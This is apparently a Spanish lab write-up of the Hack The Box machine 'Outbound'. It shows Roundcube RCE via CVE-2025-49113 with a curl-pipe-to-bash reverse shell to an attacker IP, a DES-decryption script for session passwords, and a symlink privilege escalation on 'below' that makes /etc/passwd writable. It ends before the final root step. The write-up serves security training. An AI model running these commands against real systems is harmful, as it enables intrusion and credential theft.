Outbound expone una version de RoundCube vulnerable, tras la explotacion logramos acceso inicial. Accedimos a un primero usuario con la contrasena para la base de datos. Esta ultima almacena las sesiones de usuarios donde obtuvimos la contrasena de un usuario. Las credenciales expuestas en un correo permitieron el acceso por el servicio SSH. Finalmente escalamos privilegios con el comando below a traves de un enlace simbolico.

Nombre	Outbound
OS	Linux
Puntos	20
Dificultad	Easy
Fecha de Salida	2025-07-12
IP	10.10.11.83
Maker	TheCyberGeek
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [441, 556, 1996, 2124, 968, 406, 267, 68, 19, 86], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Machine Information: Certified

La descripcion de la maquina emula una situacion “real” de un pentest proporcionando credenciales.

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


# Nmap 7.95 scan initiated Sat Jul 12 19:27:16 2025 as: /usr/lib/nmap/nmap --privileged -p22,80 -sV -sC -oN nmap_scan 10.10.11.77
Nmap scan report for 10.10.11.77
Host is up (0.25s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 12 19:27:32 2025 -- 1 IP address (1 host up) scanned in 15.29 seconds

Services Access

El par de credenciales no funcionan en el servcio SSH.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


❯ ssh tyler@10.10.11.77
The authenticity of host '10.10.11.77 (10.10.11.77)' can't be established.
ED25519 key fingerprint is SHA256:OZNUeTZ9jastNKKQ1tFXatbeOZzSFg5Dt7nhwhjorR0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.77' (ED25519) to the list of known hosts.
tyler@10.10.11.77's password: 
Permission denied, please try again.
tyler@10.10.11.77's password: 
Permission denied, please try again.
tyler@10.10.11.77's password: 
tyler@10.10.11.77: Permission denied (publickey,password).
❯

Web Site

El sitio web nos redirige al dominio mail.outbound.htb el cual agregamos al archivo /etc/hosts.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


❯ curl -sI 10.10.11.77
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.24.0 (Ubuntu)
Date: Sun, 13 Jul 2025 01:28:55 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://mail.outbound.htb/

❯

El subdominio muestra el login de Roundcube Webmail.

Roundcube Webmail

Las credenciales nos dieron acceso aunque no encontramos correos o archivos para tyler, pero si observamos la version Roundcube Webmail 1.6.10.

CVE-2025-49113

La version de Roundcube es vulnerable a CVE-2025-49113 la cual permite ejecutar comandos en la maquina.

1
2
3
4
5


❯ php CVE-2025-49113.php
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Usage: php CVE-2025-49113.php <target_url> <username> <password> <command>
❯

Ejecutamos el PoC especificando la url, las credenciales y el comando, una solicitud a nuestro servidor http.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


❯ php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "curl 10.10.14.5"
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Retrieving CSRF token and session cookie...

### Authenticating user: tyler

### Authentication successful

### Command to be executed: 
curl 10.10.14.5

### Injecting payload...

### End payload: http://mail.outbound.htb//?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C71%C77%C7%3A%C7%22%C7c%C7u%C7r%C7l%C7+%C71%C70%C7%5C%C72%C7e%C71%C70%C7%5C%C72%C7e%C71%C74%C7%5C%C72%C7e%C75%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

### Payload injected successfully

### Executing payload...

### Exploit executed successfully

❯ 

Observamos que el comando fue ejecutado.

1
2
3


❯ httphere .
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.77 - - [12/Jul/2025 19:36:56] "GET / HTTP/1.1" 200 -

User - www-data

Ejecutamos una shell inversa con shells.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


❯ php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "curl 10.10.14.5:8000/10.10.14.5:1335|bash"
### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Retrieving CSRF token and session cookie...

### Authenticating user: tyler

### Authentication successful

### Command to be executed: 
curl 10.10.14.5:8000/10.10.14.5:1335|bash

### Injecting payload...

### End payload: http://mail.outbound.htb//?_from=edit-%21%C4%22%C4%3B%C4i%C4%3A%C40%C4%3B%C4O%C4%3A%C41%C46%C4%3A%C4%22%C4C%C4r%C4y%C4p%C4t%C4_%C4G%C4P%C4G%C4_%C4E%C4n%C4g%C4i%C4n%C4e%C4%22%C4%3A%C41%C4%3A%C4%7B%C4S%C4%3A%C42%C46%C4%3A%C4%22%C4%5C%C40%C40%C4C%C4r%C4y%C4p%C4t%C4_%C4G%C4P%C4G%C4_%C4E%C4n%C4g%C4i%C4n%C4e%C4%5C%C40%C40%C4_%C4g%C4p%C4g%C4c%C4o%C4n%C4f%C4%22%C4%3B%C4S%C4%3A%C44%C43%C4%3A%C4%22%C4c%C4u%C4r%C4l%C4+%C41%C40%C4%5C%C42%C4e%C41%C40%C4%5C%C42%C4e%C41%C44%C4%5C%C42%C4e%C45%C4%3A%C48%C40%C40%C40%C4%2F%C41%C40%C4%5C%C42%C4e%C41%C40%C4%5C%C42%C4e%C41%C44%C4%5C%C42%C4e%C45%C4%3A%C41%C43%C43%C45%C4%5C%C47%C4c%C4b%C4a%C4s%C4h%C4%3B%C4%23%C4%22%C4%3B%C4%7D%C4i%C4%3A%C40%C4%3B%C4b%C4%3A%C40%C4%3B%C4%7D%C4%22%C4%3B%C4%7D%C4%7D%C4&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

### Payload injected successfully

### Executing payload...

Logrando obtener acceso como www-data.

1
2
3
4
5
6
7
8
9


❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.5] from mail.outbound.htb [10.10.11.77] 60644
/bin/sh: 0: can't access tty; job control turned off
$ whoami;id;pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/var/www/html/roundcube/public_html
$

Database

Encontramos las credenciales de la base de datos de roundcube.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52


$ ls config
config.inc.php
config.inc.php.sample
defaults.inc.php
mimetypes.php
$ cat config/config.inc.php | grep -v "// "
<?php

/*
 +-----------------------------------------------------------------------+
 | Local configuration for the Roundcube Webmail installation.           |
 |                                                                       |
 | This is a sample configuration file only containing the minimum       |
 | setup required for a functional installation. Copy more options       |
 | from defaults.inc.php to this file to override the defaults.          |
 |                                                                       |
 | This file is part of the Roundcube Webmail client                     |
 | Copyright (C) The Roundcube Dev Team                                  |
 |                                                                       |
 | Licensed under the GNU General Public License version 3 or            |
 | any later version with exceptions for skins & plugins.                |
 | See the README file for a full license statement.                     |
 +-----------------------------------------------------------------------+
*/

$config = [];

$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';

$config['imap_host'] = 'localhost:143';

$config['smtp_host'] = 'localhost:587';

$config['smtp_user'] = '%u';

$config['smtp_pass'] = '%p';

$config['support_url'] = '';

$config['product_name'] = 'Roundcube Webmail';

$config['des_key'] = 'rcmail-!24ByteDESkey*Str';

$config['plugins'] = [
    'archive',
    'zipdownload',
];

$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';
$

Vemos que hay cuatro usuarios en la maquina.

1
2
3
4
5
6


$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
tyler:x:1000:1000::/home/tyler:/bin/bash
jacob:x:1001:1001::/home/jacob:/bin/bash
mel:x:1002:1002::/home/mel:/bin/bash
$

User - Tyler

Cambiamos al usuario tyler con la contrasena ya conocida.

1
2
3
4
5


$ su tyler
Password: LhKL1o9Nm3X2
whoami;id
tyler
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler)

Roundcube Database

Ejecutamos mysql con las credenciales de la conexion de base de datos de roundcube. La tabla de usuarios no muestra hashes de contrasenas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58


www-data@mail:/var/www/html/roundcube/public_html$ mysql -u roundcube -p
Enter password: RCDBPass2025

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 297
Server version: 10.11.13-MariaDB-0ubuntu0.24.04.1 Ubuntu 24.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| roundcube          |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use roundcube;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [roundcube]> show tables;
+---------------------+
| Tables_in_roundcube |
+---------------------+
| cache               |
| cache_index         |
| cache_messages      |
| cache_shared        |
| cache_thread        |
| collected_addresses |
| contactgroupmembers |
| contactgroups       |
| contacts            |
| dictionary          |
| filestore           |
| identities          |
| responses           |
| searches            |
| session             |
| system              |
| users               |
+---------------------+
17 rows in set (0.000 sec)

MariaDB [roundcube]> select username, last_login, preferences from users;
+----------+---------------------+-----------------------------------------------------------+
| username | last_login          | preferences                                               |
+----------+---------------------+-----------------------------------------------------------+
| jacob    | 2025-06-11 07:52:49 | a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}         |
| mel      | 2025-06-08 13:29:05 | a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}         |
| tyler    | 2025-08-30 08:24:47 | a:2:{s:11:"client_hash";s:16:"ORT9K3CcgoLcTo2N";i:0;b:0;} |
+----------+---------------------+-----------------------------------------------------------+
MariaDB [roundcube]>

User Password

Porque roundcube es un cliente de correos no almacena contrasenas en la base de datos. Pero por ser un cliente de alguna manera mantiene la sesion activa, esto se muestra en la tabla session donde se almacena la configuracion de la sesion del usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


MariaDB [roundcube]> describe session;
+---------+--------------+------+-----+---------------------+-------+
| Field   | Type         | Null | Key | Default             | Extra |
+---------+--------------+------+-----+---------------------+-------+
| sess_id | varchar(128) | NO   | PRI | NULL                |       |
| changed | datetime     | NO   | MUL | 1000-01-01 00:00:00 |       |
| ip      | varchar(40)  | NO   |     | NULL                |       |
| vars    | mediumtext   | NO   |     | NULL                |       |
+---------+--------------+------+-----+---------------------+-------+
4 rows in set (0.001 sec)

MariaDB [roundcube]>

Si observamos, existen multiples sessiones, solicitamos la mas antigua.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


MariaDB [roundcube]> select changed,sess_id from session;
+---------------------+----------------------------+
| changed             | sess_id                    |
+---------------------+----------------------------+
| 2025-06-08 15:46:40 | 6a5ktqih5uca6lj8vrmgh9v0oh |
| 2025-07-13 03:16:09 | o2rmpaur2ji4vqdqb48g0c6bq8 |
| 2025-07-13 03:16:14 | tb84dvo78q3garos55bfnnehsa |
| 2025-07-13 03:22:04 | pp5du1jamtvn0bqintr0uocdlp |
| 2025-07-13 03:22:11 | 0klob0ksv9ol21qpb1250oqfke |
| 2025-07-13 03:22:15 | r2ui8e83c1oj29buok0eds5q85 |
# [...] cut [...]
| 2025-07-13 03:26:39 | 7gctbvpdufu2dnuekr3h1su6a5 |
| 2025-07-13 03:26:45 | i3a4ukv4m12s56odd9pvn6jihh |
+---------------------+----------------------------+
29 rows in set (0.000 sec)

MariaDB [roundcube]> select * from session where sess_id="6a5ktqih5uca6lj8vrmgh9v0oh";
+----------------------------+---------------------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| sess_id                    | changed             | ip         | vars                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             |
+----------------------------+---------------------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 6a5ktqih5uca6lj8vrmgh9v0oh | 2025-06-08 15:46:40 | 172.17.0.1 | bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7 |
+----------------------------+---------------------+------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.000 sec)

MariaDB [roundcube]>

El valor de vars contiene la contrasena y usuario para la sesion, en este caso el usuario jacob.

Decrypt Password

Roundcube usa el cifrado DES-EDE3-CBC para encriptar y desencriptar una string, en este caso el valor de la contrasena. La key la encontramos en el archivo config.inc.php anteriormente, la cual es la key por default.

Utilizamos el codigo de roundcube para desencriptar la contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


<?php

$encrypted_b64 = 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/';
$data = base64_decode($encrypted_b64);
$key = 'rcmail-!24ByteDESkey*Str'; 
$method = 'DES-EDE3-CBC';

$iv_size = openssl_cipher_iv_length($method);
$iv      = substr($data, 0, $iv_size);
$cipher  = substr($data, $iv_size);

$decrypted = openssl_decrypt($cipher, $method, $key, OPENSSL_RAW_DATA, $iv);

echo "Decrypted password: $decrypted \n";

Se muestra su valor.

1
2
3


❯ php key.php
Decrypted password: 595mO8DmwGeD 
❯ 

User - Jacob

Utilizamos esta contrasena para cambiar al usuario jacob.

1
2
3
4
5
6


www-data@mail:/var/www/html/roundcube/public_html$ su jacob
Password: 595mO8DmwGeD
jacob@mail:/var/www/html/roundcube/public_html$ whoami;id
jacob
uid=1001(jacob) gid=1001(jacob) groups=1001(jacob)
jacob@mail:/var/www/html/roundcube/public_html$

Uno de los correos dirigidos a jacob menciona una contrasena para este usuario.

Due to the recent change of policies your password has been changed.
Please use the following credentials to log into your account: gY4Wr3a1evp4
Remember to change your password when you next log into your account.
Thanks!
Tyler

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68


jacob@mail:~$ cat /var/mail/jacob
cat /var/mail/jacob
From MAILER_DAEMON  Sat Jun 07 13:59:11 2025
Date: Sat, 07 Jun 2025 13:59:11 +0000
From: Mail System Internal Data <MAILER-DAEMON@mail>
Subject: DON'T DELETE THIS MESSAGE -- FOLDER INTERNAL DATA
Message-ID: <1749304751@mail>
X-IMAP: 1749304518 0000000003
Status: RO

This text is part of the internal format of your mail folder, and is not
a real message.  It is created automatically by the mail system software.
If deleted, important folder data will be lost, and it will be re-created
with the data reset to initial values.

From tyler@outbound.htb  Sat Jun  7 14:00:58 2025
Return-Path: <tyler@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1000)
	id B32C410248D; Sat,  7 Jun 2025 14:00:58 +0000 (UTC)
To: jacob@outbound.htb
Subject: Important Update
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250607140058.B32C410248D@outbound.htb>
Date: Sat,  7 Jun 2025 14:00:58 +0000 (UTC)
From: tyler@outbound.htb
X-UID: 2                                        
Status: O

Due to the recent change of policies your password has been changed.

Please use the following credentials to log into your account: gY4Wr3a1evp4

Remember to change your password when you next log into your account.

Thanks!

Tyler

From mel@outbound.htb  Sun Jun  8 12:09:45 2025
Return-Path: <mel@outbound.htb>
X-Original-To: jacob
Delivered-To: jacob@outbound.htb
Received: by outbound.htb (Postfix, from userid 1002)
	id 1487E22C; Sun,  8 Jun 2025 12:09:45 +0000 (UTC)
To: jacob@outbound.htb
Subject: Unexpected Resource Consumption
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <20250608120945.1487E22C@outbound.htb>
Date: Sun,  8 Jun 2025 12:09:45 +0000 (UTC)
From: mel@outbound.htb
X-UID: 3                                        
Status: O

We have been experiencing high resource consumption on our main server.
For now we have enabled resource monitoring with Below and have granted you privileges to inspect the the logs.
Please inform us immediately if you notice any irregularities.

Thanks!

Mel

jacob@mail:~$

Verificamos la contrasena en el servicio ssh y esta es aceptada.

1
2
3
4


❯ netexec ssh 10.10.11.77 -u jacob -p gY4Wr3a1evp4
SSH         10.10.11.77     22     10.10.11.77      [*] SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12
SSH         10.10.11.77     22     10.10.11.77      [+] jacob:gY4Wr3a1evp4  Linux - Shell access!
❯

Ingresamos con las credenciales logrando leer la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34


❯ ssh jacob@10.10.11.77
jacob@10.10.11.77's password: 
Welcome to Ubuntu 24.04.2 LTS (GNU/Linux 6.8.0-63-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Jul 13 04:08:30 AM UTC 2025

  System load:  0.24              Processes:             265
  Usage of /:   70.5% of 6.73GB   Users logged in:       0
  Memory usage: 10%               IPv4 address for eth0: 10.10.11.77
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jul 10 11:44:49 2025 from 10.10.14.77
jacob@outbound:~$ whoami;id
jacob
uid=1002(jacob) gid=1002(jacob) groups=1002(jacob),100(users)
jacob@outbound:~$ ls
user.txt
jacob@outbound:~$ cat user.txt 
c2c5fa4ac9d908533ff85a7d1cb42a9b
jacob@outbound:~$

Privesc

Jacob puede ejecutar el comando below como root.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


jacob@outbound:~$ sudo -l -l
Matching Defaults entries for jacob on outbound:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User jacob may run the following commands on outbound:

Sudoers entry: /etc/sudoers
    RunAsUsers: ALL
    RunAsGroups: ALL
    Options: !authenticate
    Commands:
	/usr/bin/below *
	!/usr/bin/below --config*
	!/usr/bin/below --debug*
	!/usr/bin/below -d*
jacob@outbound:~$

Al ejecutar este comando este muestra recursos utilizados por los servicios en la maquina.

CVE-2025-27591

Below tiene una vulnerabilidad que permite escalar privilegios por medio de un Symlink al archivo /var/log/below/error_root.log. Al ejecutar below este le da permisos de lectura y escritura (0666 - rw-rw-rw-) al archivo. Al crear un symlink de error_root.log a /etc/shadow, permitiria la lectura y escritura a este.

World Writable Directory in /var/log/below Allows Local Privilege Escalation (CVE-2025-27591).

Exploit

Intentamos recrear la explotacion creando un symlink a /etc/shadow.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


jacob@outbound:~$ ls -lah /var/log/below/              
total 16K
drwxrwxrwx  3 root  root   4.0K Jul 13 04:27 .
drwxrwxr-x 13 root  syslog 4.0K Jul 13 03:01 ..
-rw-rw-rw-  1 jacob jacob   698 Jul 13 04:16 error_jacob.log
-rw-rw-rw-  1 root  root      0 Jul 13 04:27 error_root.log
drwxr-xr-x  2 root  root   4.0K Jul 13 03:00 store
jacob@outbound:~$ rm /var/log/below/error_root.log
jacob@outbound:~$ ln -sf /etc/shadow /var/log/below/error_root.log
jacob@outbound:~$ ls -lah /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Jul 13 04:28 /var/log/below/error_root.log -> /etc/shadow
jacob@outbound:~$ ls -lah /etc/shadow
-rw-r----- 1 root root 1.2K Jul 13 04:28 /etc/shadow
jacob@outbound:~$

Tras ejecutar below como root este no muestra cambios en este archivo.

1
2
3
4
5
6
7
8


jacob@outbound:~$ sudo below record

thread 'main' panicked at below/src/open_source/logging.rs:75:29:
Failed to open log path: Os { code: 1, kind: PermissionDenied, message: "Operation not permitted" }
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
jacob@outbound:~$ ls -lah /etc/shadow
-rw-r----- 1 root shadow 1.2K Jul 13 04:30 /etc/shadow
jacob@outbound:~$

Intentamos con el archivo /etc/passwd.

1
2
3
4
5
6


jacob@outbound:~$ ln -sf /etc/passwd /var/log/below/error_root.log
jacob@outbound:~$ ls -lah /var/log/below/error_root.log
lrwxrwxrwx 1 jacob jacob 11 Jul 13 04:33 /var/log/below/error_root.log -> /etc/shadow
jacob@outbound:~$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 1.2K Jul 13 04:33 /etc/passwd
jacob@outbound:~$

Tras ejecutar nuevamente below este muestra que los permisos cambiaron.

1
2
3
4
5
6
7
8
9


jacob@outbound:~$ sudo below record
Jul 13 04:34:22.066 DEBG Starting up!
Jul 13 04:34:22.067 ERRO 
----------------- Detected unclean exit ---------------------
Error Message: Failed to acquire file lock on index file: /var/log/below/store/index_01752364800: EAGAIN: Try again
-------------------------------------------------------------
jacob@outbound:~$ ls -lah /etc/passwd
-rw-rw-rw- 1 root root 1.8K Jul 13 04:34 /etc/passwd
jacob@outbound:~$

Shell

Al tener permisos de escritura sobre /etc/passwd agregamos un nuevo usuario root. Al cambiar a este usuario logramos obtener root y la flag root.txt.

1
